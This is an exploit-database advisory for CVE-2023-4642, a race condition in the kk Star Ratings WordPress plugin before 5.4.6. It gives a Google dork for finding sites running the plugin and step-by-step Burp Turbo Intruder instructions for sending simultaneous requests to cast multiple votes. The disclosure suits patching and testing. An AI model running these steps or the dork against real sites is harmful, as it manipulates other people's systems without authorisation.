Headline
KK Star Ratings Race Condition
KK Star Ratings versions prior to 5.4.6 suffer from rate tampering via a race condition vulnerability.
# Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via RaceCondition# Google Dork: inurl:/wp-content/plugins/kk-star-ratings/# Date: 2023-11-06# Exploit Author: Mohammad Reza Omrani# Vendor Homepage: https://github.com/kamalkhan# Software Link: https://wordpress.org/plugins/kk-star-ratings/# WPScan :https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/# Version: 5.4.6# Tested on: Wordpress 6.2.2# CVE : CVE-2023-4642# POC:1- Install and activate kk Star Ratings.2- Go to the page that displays the star rating.3- Using Burp and the Turbo Intruder extension, intercept the ratingsubmission.4- Send the request to Turbo Intruder using Action > Extensions > TurboIntruder > Send to turbo intruder.5- Drop the initial request and turn Intercept off.6- In the Turbo Intruder window, add "%s" to the end of the connectionheader (e.g. "Connection: close %s").7- Use the code `examples/race.py`.8- Click "Attack" at the bottom of the window. This will send multiplerequests to the server at the same moment.9- To see the updated total rates, reload the page you tested.
Related news
CVE-2023-4642
The kk Star Ratings WordPress plugin before 5.4.6 does not implement atomic operations, allowing one user vote multiple times on a poll due to a Race Condition.